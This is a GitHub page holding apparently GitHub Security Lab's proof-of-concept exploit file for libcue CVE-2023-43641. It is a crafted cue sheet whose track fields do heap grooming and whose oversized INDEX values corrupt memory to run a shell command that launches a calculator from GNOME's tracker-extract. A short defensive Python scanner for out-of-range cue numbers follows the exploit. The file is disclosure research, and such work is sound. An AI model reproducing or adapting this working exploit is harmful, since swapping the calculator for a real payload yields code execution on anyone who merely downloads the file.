lunar.cue
44698 lines (377 loc) · 64 KB
PERFORMER Kev
TITLE "Kev'z Warez"
FILE pwned.mp3 MP3
TRACK 000 AUDIO
MESSAGE "First some [heap feng shui](https://en.wikipedia.org/wiki/Heap_feng_shui):
allocate memory so that all subsequent allocations come from a continguous block of
memory. For example, this string is 251 characters long to use a chunk from tcache
index 15."
TRACK 001 AUDIO
TITLE "A Track is 0x3a8 bytes, so creating many new tracks is a quick way to use lots of memory."
TRACK 002 AUDIO
TITLE "Again "
TRACK 003 AUDIO
TITLE "Again "
TRACK 004 AUDIO
TITLE "Again "
TRACK 005 AUDIO
TITLE "Again "
TRACK 006 AUDIO
TITLE "Again "
TRACK 007 AUDIO
TITLE "Again "
TRACK 008 AUDIO
TITLE "Again "
TRACK 009 AUDIO
TITLE "Again "
TRACK 010 AUDIO
TITLE "Again "
TRACK 011 AUDIO
TITLE "Again "
TRACK 012 AUDIO
TITLE "Again "
TRACK 013 AUDIO
TITLE "Again "
TRACK 014 AUDIO
TITLE "Again "
TRACK 015 AUDIO
TITLE "Again "
TRACK 016 AUDIO
TITLE "Again "
TRACK 017 AUDIO
TITLE "Again "
TRACK 018 AUDIO
TITLE "Again "
TRACK 019 AUDIO
TITLE "Again "
TRACK 020 AUDIO
TITLE "Again "
TRACK 021 AUDIO
TITLE "Again "
TRACK 022 AUDIO
TITLE "Again "
TRACK 023 AUDIO
TITLE "Again "
TRACK 024 AUDIO
TITLE "Again "
TRACK 025 AUDIO
TITLE "Again "
TRACK 026 AUDIO
TITLE "Again "
TRACK 027 AUDIO
TITLE "Again "
TRACK 028 AUDIO
TITLE "Again "
TRACK 029 AUDIO
TITLE "Again "
TRACK 030 AUDIO
TITLE "Again "
TRACK 031 AUDIO
TITLE "Again "
TRACK 032 AUDIO
TITLE "Again "
TRACK 033 AUDIO
TITLE "Heap Feng Shui: empty the tcache"
COMPOSER "Allocate a chunk from tcache index 2 "
ARRANGER "Allocate a chunk from tcache index 4 "
PERFORMER "Allocate a chunk from tcache index 6
"
SONGWRITER "Allocate a chunk from tcache index 7
"
GENRE "Allocate a chunk from tcache index 11
"
MESSAGE "The goal here is to ensure that all subsequent allocations come
from a large contiguous block of memory. This string allocates a chunk from
tcache index 13. Doing this 14 times guarantees that the tcache is empty. "
TRACK 034 AUDIO
TITLE "Copyright (c) 2023 GitHub, Inc."
COMPOSER "[GitHub Security Lab](https://securitylab.github.com/)"
ARRANGER "
This version of the poc is tuned for Ubuntu 23.04 (Lunar Lobster)
"
PERFORMER "[Kevin Backhouse](https://github.com/kevinbackhouse)
"
SONGWRITER "
"
GENRE "[The Malloc Maleficarum](https://seclists.org/bugtraq/2005/Oct/118).
See also: [how2heap](https://github.com/shellphish/how2heap).
"
MESSAGE "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out of bounds
array access in track_set_index. The vulnerability is used to get code execution in GNOME's
tracker-extract. Download this file to pop a calc."
TRACK 035 AUDIO
TITLE "Never Gonna Give You Up "
COMPOSER "Rick Astley "
ARRANGER " "
PERFORMER "
We're no strangers to love
You know the rules and so do I
"
SONGWRITER "
A full commitment's what I'm thinking of
You wouldn't get this from any other guy
"
GENRE "
I just want to tell you how I'm feeling
Gotta make you understand
"
MESSAGE "
Never gonna give you up, never gonna let you down
Never gonna run around and desert you
Never gonna make you cry, never gonna say goodbye
Never gonna tell a lie and hurt you
"
TRACK 036 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 037 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 038 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 039 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 040 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 041 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 042 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 043 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 044 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 045 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 046 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 047 AUDIO
TITLE "for freeing to tcache index 1"
TITLE "free previous title"
INDEX 4294964432 4294958312
TRACK 048 AUDIO
TITLE "Allocate previously freed string"
INDEX 4294967268 149
INDEX 4294964250 4294958324
TITLE "long string to overwrite low bytes of address ð"
INDEX 4294955254 69
FILE pwned.mp3 MP3
GENRE "set low bytes of info->file P"
TITLE "long string to overwrite low bytes of address 0"
INDEX 4294955262 53
FILE pwned.mp3 MP3
PERFORMER "set low bytes of file->g_class Ð"
INDEX 4294955259 0
TITLE "long string to overwrite low bytes of address "
INDEX 4294955322 85
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address ° "
INDEX 4294955150 69
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address "
INDEX 4294955292 277
FILE pwned.mp3 MP3
MESSAGE "set low bytes of tcache->entries[15] `"
MESSAGE "kevwozere"
TITLE "long string to overwrite low bytes of address Ð"
INDEX 4294955282 85
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address à"
INDEX 4294955284 949
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address 0"
INDEX 4294955294 949
FILE pwned.mp3 MP3
TITLE "long title to allocate 0x110-sized chunk. "
TRACK 049 AUDIO
INDEX 4294967243 0
INDEX 4294967247 1
INDEX 4294967254 0
INDEX 4294967255 0
TRACK 050 AUDIO
TITLE "Overwrite low bytes of track->file.name `"
INDEX 4294967294 277
FILE "wen poc?" MP3
TITLE "Overwrite low bytes of track->file.name à"
INDEX 14 949
FILE pwned.mp3 MP3
TITLE "Overwrite low bytes of track->file.name 0"
INDEX 24 949
FILE pwned.mp3 MP3
TITLE "Overwrite low bytes of track->file.name °"
INDEX 4294967272 53
FILE pwned.mp3 MP3
INDEX 0 4294967295
INDEX 1 0
INDEX 1 1892336
INDEX 14 0
TRACK 051 AUDIO
FLAGS
TRACK 052 AUDIO
ISRC looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-string-to-allocate-0x110-sized-chunk
TITLE "long title to overwrite low bytes of track->isrc `"
INDEX 4294967294 277
ISRC short-string
INDEX 0 4294967295
INDEX 1 0
INDEX 1 242320
INDEX 4294967088 0
INDEX 4294967090 0
INDEX 4294967271 100
INDEX 4294967273 0
INDEX 4294967280 80
TRACK 053 AUDIO
INDEX 4294963806 4294958357
TRACK 054 AUDIO
INDEX 4294967279 0
INDEX 4294963634 4294958317
TRACK 055 AUDIO
INDEX 4294967282 0
INDEX 4294963462 3817
TITLE "Temporary long title for tcache index 6 "
TITLE "short title"
TRACK 056 AUDIO
TITLE "Use long title from tcache index 6 "
INDEX 4294967258 197
TITLE " /bin/bash"
INDEX 4294963270 3818
TRACK 057 AUDIO
INDEX 4294967279 25389
INDEX 4294963098 3819
TITLE "Temporary long title for tcache index 6 "
TITLE "eta son"
TRACK 058 AUDIO
TITLE "Use long title from tcache index 6 "
INDEX 4294967258 357
TITLE "This command is going to get called repeatedly in an infinite loop, so send SIGSTOP to avoid a fork-bomb and use flock so only one calculator starts. killall -SIGSTOP tracker-extract-3; flock -w 3 ~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm ~/Downloads/pwned.lock; killall -9 tracker-extract-3)"
INDEX 4294962906 4294958329
PERFORMER "Temporary long name for tcache index 6 "
PERFORMER "short name"
TRACK 059 AUDIO
INDEX 4294962714 4566
TITLE "Use chunk from tcache index 6 "
INDEX 4294967258 197
TITLE "short title"
TRACK 060 AUDIO
INDEX 4294962538 4565
TITLE " Ð"
TRACK 1337 AUDIO
INDEX 4294967290 0
TITLE "Use the chunk that is still in tcache index 2"
MESSAGE "pop that calc "
REM DATE "1992 AD"
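The MESSAGE on TRACK 034 states what the file exploits: an out-of-bounds array access in libcue's track_set_index, reached through INDEX lines whose index number is nowhere near the two-digit range a cue sheet uses (4294967294, 4294967268, ...). A cheap defensive check for a file-scanning pipeline is to parse TRACK and INDEX numbers and flag anything outside that range before the file reaches an extractor. The scanner below is an added example, not code from the PoC, from libcue, or from GitHub Security Lab; it assumes the cue sheet format's valid ranges (INDEX 00-99, TRACK 01-99) and that a C parser would hold the oversized value in a 32-bit signed int, which it mirrors with a wrap-around helper so the report shows the negative index the value turns into. The sample input is constructed; three of its numbers are copied from the PoC above.

```python
"""Defensive cue-sheet scanner: flags TRACK / INDEX numbers outside the ranges the
cue sheet format defines.  Added example, not part of the PoC or of libcue.
Assumptions: INDEX numbers are 00-99 and TRACK numbers 01-99 (cue sheet format);
a permissive C parser stores the number in a 32-bit signed int, so the report also
shows the value after two's-complement wrap-around."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Valid ranges taken from the cue sheet format (assumption, not stated on the page).
MIN_TRACK, MAX_TRACK = 1, 99
MIN_INDEX, MAX_INDEX = 0, 99

_TRACK_RE = re.compile(r'^\s*TRACK\s+(\S+)\s+(\S+)\s*$', re.IGNORECASE)
_INDEX_RE = re.compile(r'^\s*INDEX\s+(\S+)\s+(\S+)\s*$', re.IGNORECASE)


@dataclass
class Finding:
    line_no: int              # 1-based line number in the cue sheet
    field: str                # "TRACK" or "INDEX"
    raw: str                  # the number token exactly as written
    value: Optional[int]      # parsed value, None if the token had no digits
    as_int32: Optional[int]   # the same value wrapped into a 32-bit signed int


def to_int32(v: int) -> int:
    """Wrap an integer into the range of a 32-bit signed int (two's complement),
    e.g. 4294967294 -> -2.  Mirrors how an oversized decimal ends up in a C int
    (assumption about the consuming parser, not a libcue detail from the page)."""
    return ((v + 2**31) % 2**32) - 2**31


def parse_leading_int(tok: str) -> Optional[int]:
    """atoi-style parse: optional sign and leading decimal digits only."""
    m = re.match(r'[+-]?\d+', tok)
    return int(m.group(0)) if m else None


def scan_cue(text: str) -> List[Finding]:
    """Return one Finding per TRACK or INDEX line whose number is out of range
    or unparsable.  In-range lines produce nothing."""
    findings: List[Finding] = []
    checks = (("TRACK", _TRACK_RE, MIN_TRACK, MAX_TRACK),
              ("INDEX", _INDEX_RE, MIN_INDEX, MAX_INDEX))
    for n, line in enumerate(text.splitlines(), start=1):
        for field, rx, lo, hi in checks:
            m = rx.match(line)
            if not m:
                continue
            tok = m.group(1)
            v = parse_leading_int(tok)
            if v is None or not (lo <= v <= hi):
                findings.append(Finding(n, field, tok, v,
                                        to_int32(v) if v is not None else None))
    return findings


def format_report(findings: List[Finding]) -> List[str]:
    """Human-readable lines, one per finding, for a log or a scan result."""
    out = []
    for f in findings:
        wrapped = f"(as int32: {f.as_int32})" if f.as_int32 is not None else "(no digits)"
        out.append(f"line {f.line_no}: {f.field} number {f.raw!r} out of range {wrapped}")
    return out


# Constructed sample; the three oversized numbers are copied from the PoC above.
SAMPLE_CUE = """REM constructed sample cue sheet
FILE pwned.mp3 MP3
TRACK 01 AUDIO
  TITLE "benign track"
  INDEX 01 00:00:00
TRACK 048 AUDIO
  INDEX 4294967268 149
  INDEX 14 949
TRACK 1337 AUDIO
  INDEX 4294967290 0
"""

if __name__ == "__main__":
    for line in format_report(scan_cue(SAMPLE_CUE)):
        print(line)
```

Running the block on the sample reports the INDEX on line 7 (which a 32-bit parser would see as -28), the TRACK 1337 line, and the INDEX on line 10 (-6); the benign track and the in-range `INDEX 14` line are not reported. The wrapped value is shown only to make the negative index visible in a report; the decision to flag is taken on the decimal as written, so an out-of-range number is caught whether or not the consumer wraps it.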